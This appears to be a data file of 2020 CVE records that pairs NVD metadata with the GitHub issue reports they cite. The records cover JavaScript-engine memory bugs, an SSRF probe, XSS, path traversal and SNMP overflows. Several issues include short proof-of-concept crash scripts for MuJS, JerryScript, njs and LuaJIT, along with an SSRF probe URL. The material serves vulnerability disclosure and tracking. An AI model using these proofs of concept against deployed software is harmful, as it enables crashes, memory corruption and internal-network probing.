"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/prometheus/blackbox_exporter/issues/669"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://prometheus.io/docs/operating/security/#... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:prometheus:blackbox_exporter:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52D6034A-7D2F-4E19-ABF5-579ACAC6DC14",
"versionEndExcluding": null,
"versionEndIncluding": "0.17.0",
"versi... | [
"918"
] | 918 | https://github.com/prometheus/blackbox_exporter/issues/669 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"prometheus",
"blackbox_exporter"
] | SSRF Vulnerablity
During the company's penetration test, it was found that the Blackbox
> Exporter service was opened on the Internet, which led to the ssrf
> detection of the company's internal network
>
> Set up the Blackbox Exporter test environment, and then visit:
>
> http://123.123.123.123:9115/probe?targe... | Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. | https://api.github.com/repos/prometheus/blackbox_exporter/issues/669/comments | 8 | 2020-08-03T02:20:15Z | 2020-08-14T09:43:12Z | https://github.com/prometheus/blackbox_exporter/issues/669 | 671,747,939 | 669 | 1,373 |
CVE-2020-17479 | 2020-08-10T20:15:11.673 | jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://blog.sonatype.com/cve-2020-17479"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/manvel-khnkoyan/jpv/commit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json_pattern_validator_project:json_pattern_validator:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "4C1CCE0A-33EB-4196-A1CF-72CAD459CC70",
"versionEndExcluding": "2.2.2",
"versionEndInclud... | [
"20"
] | 20 | https://github.com/manvel-khnkoyan/jpv/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"manvel-khnkoyan",
"jpv"
] | Hello,
I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this GitHub issue? | Validation Bypass | https://api.github.com/repos/manvel-khnkoyan/jpv/issues/10/comments | 3 | 2020-08-06T20:07:51Z | 2020-08-19T10:37:57Z | https://github.com/manvel-khnkoyan/jpv/issues/10 | 674,570,517 | 10 | 1,374 |
CVE-2020-15071 | 2020-08-11T18:15:13.020 | content/content.blueprintsevents.php in Symphony CMS 3.0.0 allows XSS via fields['name'] to appendSubheading. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/symphonycms/symphonycms/issues/2917"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getsymphony:symphony:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8AE817F8-2BFA-44BD-ABB1-5F011285A168",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"79"
] | 79 | https://github.com/symphonycms/symphonycms/issues/2917 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"symphonycms",
"symphonycms"
] | https://github.com/symphonycms/symphonycms/blob/master/symphony/content/content.blueprintsevents.php
`$about = General::array_map_recursive('stripslashes', $existing->about());`
....
....
....
`$this->appendSubheading(($isEditing ? $about['name'] : __('Untitled')))`
....
....
....
```
public function append... | XSS vulnerability | https://api.github.com/repos/symphonycms/symphonycms/issues/2917/comments | 1 | 2020-06-18T01:57:47Z | 2020-06-18T02:02:36Z | https://github.com/symphonycms/symphonycms/issues/2917 | 640,848,737 | 2,917 | 1,375 |
CVE-2020-17495 | 2020-08-11T21:15:10.943 | django-celery-results through 1.2.1 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/celery/django-celery-results/issues/142"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/celery/django-cel... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:django-celery-results_project:django-celery-results:*:*:*:*:*:*:*:*",
"matchCriteriaId": "41339B4A-04CD-4B0B-B108-06334AA4D183",
"versionEndExcluding": null,
"versionEndIncluding": "1.2.... | [
"312"
] | 312 | https://github.com/celery/django-celery-results/issues/142 | [
"Third Party Advisory"
] | github.com | [
"celery",
"django-celery-results"
] | Hi, apologies if this is documented somewhere (I can't find it), but is there a quick way not to store the arguments that were passed to the celery task? Some of my tasks take in potentially sensitive information, and I would prefer not to have a permanent record of them inside of my database (I'm also looking at encry... | Question: Disable storing of task arguments | https://api.github.com/repos/celery/django-celery-results/issues/142/comments | 16 | 2020-04-13T19:27:43Z | 2022-07-09T19:59:02Z | https://github.com/celery/django-celery-results/issues/142 | 599,084,913 | 142 | 1,376 |
CVE-2020-24343 | 2020-08-13T19:15:13.677 | Artifex MuJS through 1.0.7 has a use-after-free in jsrun.c because of unconditional marking in jsgc.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ccxvii/mujs/issues/136"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:artifex:mujs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE48D58D-92C2-4D2E-88FA-EF18351637F5",
"versionEndExcluding": null,
"versionEndIncluding": "1.0.7",
"versionStartExcluding"... | [
"416"
] | 416 | https://github.com/ccxvii/mujs/issues/136 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ccxvii",
"mujs"
] | git hash: `9f3e141d805cddec7cce1fae38373a82c61e3300`
cmd: `mujs poc.js`
POC:
```javascript
b = false
function c() {
if (!b) {
function c() { this[a = this] = a}
JSON.parse("[]", c)
this[2] = a
}
b = true
return this[Array(a = Array(1, 2, true) ,{})] = a
}
JSON.... | AddressSanitizer: heap-use-after-free /home/yongheng/mujs/jsrun.c:1362 in jsR_run | https://api.github.com/repos/ccxvii/mujs/issues/136/comments | 17 | 2020-06-28T19:13:31Z | 2020-08-14T16:57:00Z | https://github.com/ccxvii/mujs/issues/136 | 646,987,460 | 136 | 1,377 |
CVE-2020-24344 | 2020-08-13T19:15:13.740 | JerryScript through 2.3.0 has a (function({a=arguments}){const arguments}) buffer over-read. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/3976"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995",
"versionEndExcluding": null,
"versionEndIncluding": "2.3.0",
"versionStar... | [
"125"
] | 125 | https://github.com/jerryscript-project/jerryscript/issues/3976 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ### JerryScript revision
git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2
### Test case
```javascript
( function ( { a = arguments }) {
const arguments
}
)
```
In debug build, it triggers an assertion 'scope_stack_p > context_p->scope_stack_p' failed
### Execution steps
./jerry poc.js
### Bui... | Heap overflow in jerry-core | https://api.github.com/repos/jerryscript-project/jerryscript/issues/3976/comments | 14 | 2020-07-05T20:43:50Z | 2021-06-16T09:03:07Z | https://github.com/jerryscript-project/jerryscript/issues/3976 | 651,142,365 | 3,976 | 1,378 |
CVE-2020-24345 | 2020-08-13T19:15:13.807 | JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/3977"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995",
"versionEndExcluding": null,
"versionEndIncluding": "2.3.0",
"versionStar... | [
"787"
] | 787 | https://github.com/jerryscript-project/jerryscript/issues/3977 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ### JerryScript revision
git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2
### Test case
```javascript
function a() { new new Proxy(a, {}) }
JSON.parse("[]", a)
```
### Execution steps
./jerry poc.js
### Build cmd
python tools/build.py --compile-flag="-fsanitize=address"
Stack dump:
---
```
ASAN:... | Stack overflow in ecma_is_lexical_environment | https://api.github.com/repos/jerryscript-project/jerryscript/issues/3977/comments | 2 | 2020-07-06T05:01:36Z | 2024-09-03T10:11:11Z | https://github.com/jerryscript-project/jerryscript/issues/3977 | 651,247,064 | 3,977 | 1,379 |
CVE-2020-24346 | 2020-08-13T19:15:13.880 | njs through 0.4.3, used in NGINX, has a use-after-free in njs_json_parse_iterator_call in njs_json.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/325"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netap... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.3",
"versionStartExcluding": null... | [
"416"
] | 416 | https://github.com/nginx/njs/issues/325 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5`
POC:
```javascript
function a() {
this[this['use asm'] = this[this[1024] = ArrayBuffer]] = this[ArrayBuffer] =
4000
}
JSON.parse("[1, 2, []]", a)
```
cmd: `njs poc.js`
Stack dump:
```
=====================================... | heap-use-after-free in njs_json_parse_iterator_call | https://api.github.com/repos/nginx/njs/issues/325/comments | 1 | 2020-06-28T18:40:42Z | 2020-10-06T17:02:21Z | https://github.com/nginx/njs/issues/325 | 646,981,993 | 325 | 1,380 |
CVE-2020-24347 | 2020-08-13T19:15:13.943 | njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_lvlhsh_level_find in njs_lvlhsh.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/323"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netap... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.3",
"versionStartExcluding": null... | [
"125"
] | 125 | https://github.com/nginx/njs/issues/323 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5`
POC:
```javascript
var once = false ;
var a = 1 ;
function f ( ) { if ( this [ 8 ] = new Uint32Array ( this , this [ 8 ] , ) ) { a = new Array ( new Uint32Array ( a = new Array ( Array , 3 ) ) , { }
, new ArrayBuffer ( this [ 8 ] ) , 2 , ... | Segfault in njs_lvlhsh_bucket_find | https://api.github.com/repos/nginx/njs/issues/323/comments | 0 | 2020-06-27T19:58:35Z | 2020-10-06T16:55:13Z | https://github.com/nginx/njs/issues/323 | 646,750,520 | 323 | 1,381 |
CVE-2020-24348 | 2020-08-13T19:15:14.003 | njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_json_stringify_iterator in njs_json.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/322"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netap... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.3",
"versionStartExcluding": null... | [
"125"
] | 125 | https://github.com/nginx/njs/issues/322 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5`
POC:
```javascript
var array = [];
var funky;
funky = {
get value() { array[10000000] = 12; }
};
for (var i = 0; i < 10; i++)
array[i] = i;
array[3] = funky;
'' == JSON.stringify(array);
```
cmd: `njs poc.js`
Stack dump:
```... | Segfault in njs_json_stringify_iterator | https://api.github.com/repos/nginx/njs/issues/322/comments | 0 | 2020-06-27T19:55:59Z | 2020-10-06T17:53:12Z | https://github.com/nginx/njs/issues/322 | 646,750,084 | 322 | 1,382 |
CVE-2020-24349 | 2020-08-13T19:15:14.050 | njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be "fluff" in the NGINX use case because there is no remote attack surface. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://cwe.mitre.org/data/definitions/416.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1171CB43-C37C-4242-AD28-A8B94D288BE3",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.3",
"versionStartExcluding": null... | [
"416"
] | 416 | https://github.com/nginx/njs/issues/324 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Version:`0.4.2`, git commit `32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5`
This bug is likely exploitable.
POC:
```javascript
function a() {
new Uint32Array(this[8] = a)
return Array
}
JSON.parse("[1, 2, []]", a)
```
cmd: `njs poc.js`
Stack dump:
```
#0 0x0000623000000cc0 in ?? ()
#1 0x000000000... | Control flow hijack in njs_value_property | https://api.github.com/repos/nginx/njs/issues/324/comments | 5 | 2020-06-27T20:07:39Z | 2020-10-06T16:56:40Z | https://github.com/nginx/njs/issues/324 | 646,752,255 | 324 | 1,383 |
CVE-2020-24372 | 2020-08-17T17:15:13.987 | LuaJIT through 2.1.0-beta3 has an out-of-bounds read in lj_err_run in lj_err.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LuaJIT/LuaJIT/issues/603"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:luajit:luajit:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7369364F-A393-4616-B40E-8097CA70E957",
"versionEndExcluding": null,
"versionEndIncluding": "2.0.5",
"versionStartExcluding... | [
"125"
] | 125 | https://github.com/LuaJIT/LuaJIT/issues/603 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LuaJIT",
"LuaJIT"
] | Hi, we found a crash in LuaJit
Version: 2.1. Git hash: `570e758ca7dd14f93efdd43d68cf8979c1d7f984`
POC:
```lua
function errfunc() print(xpcall(test, errfunc)) end function test(do_yield) mt =
{} local t print(xpcall(test, errfunc)) function errfunc() end function
test() end coroutine.wrap(function() en... | Second segfault in lj_err_run | https://api.github.com/repos/LuaJIT/LuaJIT/issues/603/comments | 3 | 2020-07-14T01:15:30Z | 2020-08-18T02:58:23Z | https://github.com/LuaJIT/LuaJIT/issues/603 | 656,251,924 | 603 | 1,384 |
CVE-2020-14934 | 2020-08-18T17:15:11.347 | Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. If the number of variables in the request exceeds the allocated buffer, a mem... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://drive.google.com/file/d/1NIf0Y0S47Lu85uSi29kt9tgSh0jYZYfj/view?usp=sharing"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*",
"matchCriteriaId": "031BDB59-5EDC-4D78-8E74-9432B766A874",
"versionEndExcluding": null,
"versionEndIncluding": "4.5",
"versionStartExc... | [
"787"
] | 787 | https://github.com/contiki-ng/contiki-ng/issues/1352 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"contiki-ng",
"contiki-ng"
] | ### Description of defect
**References:**
https://github.com/contiki-ng/contiki-ng/tree/release/v4.5
https://github.com/contiki-ng/contiki-ng/tree/release/v4.4
**File:**
[snmp-engine.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-engine.c)
[snmp-message.c](https:/... | Buffer overflow in .bss section due to SNMP request overflow | https://api.github.com/repos/contiki-ng/contiki-ng/issues/1352/comments | 1 | 2020-08-17T19:31:04Z | 2020-11-25T18:28:24Z | https://github.com/contiki-ng/contiki-ng/issues/1352 | 680,475,979 | 1,352 | 1,386 |
CVE-2020-14935 | 2020-08-18T17:15:11.393 | Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is ass... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*",
"matchCriteriaId": "881B1086-BAE1-4159-B69E-E01EE3AB64DD",
"versionEndExcluding": null,
"versionEndIncluding": "4.5",
"versionStartExc... | [
"787"
] | 787 | https://github.com/contiki-ng/contiki-ng/issues/1353 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"contiki-ng",
"contiki-ng"
] | ### Description of defect
**References:**
https://github.com/contiki-ng/contiki-ng/tree/release/v4.5
https://github.com/contiki-ng/contiki-ng/tree/release/v4.4
**File:**
[snmp-engine.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-engine.c)
[snmp-message.c](https://g... | Stack overflow in SNMP bulk request processing | https://api.github.com/repos/contiki-ng/contiki-ng/issues/1353/comments | 1 | 2020-08-17T19:35:01Z | 2023-04-16T06:01:07Z | https://github.com/contiki-ng/contiki-ng/issues/1353 | 680,478,148 | 1,353 | 1,387 |
CVE-2020-14936 | 2020-08-18T17:15:11.440 | Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. Functions parsing the OIDs in SNMP requests lack sufficient allocated target-buffer capacity verification when writing parsed OID values. The function snmp_oid_decode_oid() may overwrite memory areas beyond the provided target buffer, wh... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://drive.google.com/file/d/1FypWH_g475jSL0mDFzquaATCeRIHQ2kj/view?usp=sharing"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/contiki-ng/conti... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:contiki-ng:contiki-ng:*:*:*:*:*:*:*:*",
"matchCriteriaId": "031BDB59-5EDC-4D78-8E74-9432B766A874",
"versionEndExcluding": null,
"versionEndIncluding": "4.5",
"versionStartExc... | [
"787"
] | 787 | https://github.com/contiki-ng/contiki-ng/issues/1351 | [
"Third Party Advisory"
] | github.com | [
"contiki-ng",
"contiki-ng"
] | ### Description of defect
**References:**
https://github.com/contiki-ng/contiki-ng/tree/release/v4.5
https://github.com/contiki-ng/contiki-ng/tree/release/v4.4
**File:**
[snmp-oid.c](https://github.com/contiki-ng/contiki-ng/blob/release/v4.5/os/net/app-layer/snmp/snmp-oid.c)
**Analysis:**
Memory access o... | Out of bounds memory read/write in SNMP agent | https://api.github.com/repos/contiki-ng/contiki-ng/issues/1351/comments | 1 | 2020-08-17T19:24:47Z | 2020-11-25T18:28:24Z | https://github.com/contiki-ng/contiki-ng/issues/1351 | 680,472,406 | 1,351 | 1,388 |
CVE-2020-24381 | 2020-08-19T12:15:11.340 | GUnet Open eClass Platform (aka openeclass) before 3.11 might allow remote attackers to read students' submitted assessments because it does not ensure that the web server blocks directory listings, and the data directory is inside the web root by default. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://emaragkos.gr/cve-2020-24381/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gunet/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gunet:open_eclass_platform:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59A23733-2777-4642-A2E1-35AC63B031A3",
"versionEndExcluding": "3.11",
"versionEndIncluding": null,
"versionSt... | [
"200"
] | 200 | https://github.com/gunet/openeclass/issues/39 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gunet",
"openeclass"
] | **Improper Access Control by Directory Listing Misconfiguration that affects all versions**
When the webapp is poorly configured (directory listing is enabled), an unauthenticated remote attacker will be able to read students' submitted assessments because it does not ensure that the web server blocks directory list... | Improper Access Control by Directory Listing Misconfiguration | https://api.github.com/repos/gunet/openeclass/issues/39/comments | 7 | 2020-08-17T16:03:50Z | 2021-05-23T21:16:23Z | https://github.com/gunet/openeclass/issues/39 | 680,346,433 | 39 | 1,389 |
CVE-2020-24368 | 2020-08-19T15:15:12.620 | Icinga Icinga Web2 2.0.0 through 2.6.4, 2.7.4 and 2.8.2 has a Directory Traversal vulnerability which allows an attacker to access arbitrary files that are readable by the process running Icinga Web 2. This issue is fixed in Icinga Web 2 in v2.6.4, v2.7.4 and v2.8.2. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00026.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url":... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ECF58CFB-8102-44AC-8089-05199B4B751C",
"versionEndExcluding": "2.6.4",
"versionEndIncluding": null,
"versionStartExc... | [
"22"
] | 22 | https://github.com/Icinga/icingaweb2/issues/4226 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Icinga",
"icingaweb2"
] | The vulnerability in question allows an attacker to access arbitrary files which are readable by the process running Icinga Web 2. (This is usually the web server or fpm process)
To exploit this vulnerability the attacker has to acquire the following knowledge:
- The URI at which Icinga Web 2 is accessible
- An ... | Possible path traversal when serving static image files | https://api.github.com/repos/Icinga/icingaweb2/issues/4226/comments | 0 | 2020-08-14T12:33:43Z | 2020-08-19T09:02:24Z | https://github.com/Icinga/icingaweb2/issues/4226 | 679,127,062 | 4,226 | 1,390 |
CVE-2020-15861 | 2020-08-20T01:17:13.837 | Net-SNMP through 5.7.3 allows Escalation of Privileges because of UNIX symbolic link (symlink) following. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
